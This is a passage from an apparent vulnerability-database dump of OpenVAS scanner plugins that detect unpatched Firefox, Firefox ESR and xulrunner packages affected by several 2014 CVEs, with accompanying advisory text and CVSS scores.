ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:50", "description": "Oracle Linux Local Security Checks ELSA-2015-0046", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-0046", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123204", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123204", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0046.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123204\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:41 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0046\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0046 - firefox security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0046\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0046.html\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.0.1.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~31.4.0~1.0.1.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xulrunner-devel\", rpm:\"xulrunner-devel~31.4.0~1.0.1.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Check the version of firefox", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for firefox CESA-2015:0046 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882100", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2015:0046 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882100\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:57:30 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for firefox CESA-2015:0046 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n * The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0046\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020876.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:59", "description": "Check the version of firefox", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for firefox CESA-2015:0046 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882096", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882096", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2015:0046 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882096\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:56:41 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for firefox CESA-2015:0046 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n * The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0046\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020873.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:23", "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805250", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805250", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mozilla_firefox_esr_mult_vuln01_jan15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805250\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8641\", \"CVE-2014-8639\", \"CVE-2014-8638\", \"CVE-2014-8634\");\n script_bugtraq_id(72044, 72046, 72047, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 13:51:45 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - Some unspecified errors.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions, and compromise a user's\n system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR 31.x before 31.4 on\n Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 31.4\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/firefox/organizations\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(ffVer =~ \"^31\\.\")\n{\n if((version_in_range(version:ffVer, test_version:\"31.0\", test_version2:\"31.3\")))\n {\n fix = \"31.4\";\n report = 'Installed version: ' + ffVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:20", "description": "Check the version of firefox", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for firefox CESA-2015:0046 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882091", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2015:0046 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882091\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:56:22 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for firefox CESA-2015:0046 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n * The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0046\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020877.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:08", "description": "Check the version of xulrunner", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for xulrunner CESA-2015:0046 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882099", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xulrunner CESA-2015:0046 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882099\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:57:24 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for xulrunner CESA-2015:0046 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of xulrunner\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n * The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"affected\", value:\"xulrunner on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0046\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020875.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~31.4.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner-devel\", rpm:\"xulrunner-devel~31.4.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:43", "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mozilla_firefox_esr_mult_vuln01_jan15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805251\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8641\", \"CVE-2014-8639\", \"CVE-2014-8638\", \"CVE-2014-8634\");\n script_bugtraq_id(72044, 72046, 72047, 